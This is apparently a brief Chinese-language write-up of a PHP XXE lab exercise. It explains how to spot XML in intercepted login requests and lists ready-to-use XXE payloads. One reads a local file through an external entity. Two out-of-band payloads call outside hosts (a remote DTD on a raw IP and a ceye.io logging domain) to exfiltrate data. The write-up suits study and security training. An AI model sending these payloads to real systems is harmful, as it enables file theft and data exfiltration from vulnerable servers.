这是xxe_lab 里面的php xxe的题目
看这个xxe 的 漏洞 一般看包里面是否存在<> 这种标签 或者 存在xml 的格式
抓包查看
输入 admin 123456 之后
正常的一般提交数据 都是 username = admin password= 123456
这里却不是这样的
很想html 和xml 的 语法
发送过去返回的格式就是 text/html
这里 <!ENTITY f 这里的 f
在下面xml 数据里面要有 相当于是个变量
&f;
所以就输出了 123123
<?xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY f SYSTEM "file:///C://123.txt">
]>
<user><username>&f;</username><password>admin</password></user>
外带
payload
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://211.159.223.136:888/xs.dtd">%aaa;%ccc;%ddd;]>
<user><username>&aaa;</username><password>1</password></user>
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://192.168.100.123.wvt4ld.ceye.io/xxe_test">
%remote;]>
<root/>
<user><username>&remote;</username><password>1</password></user>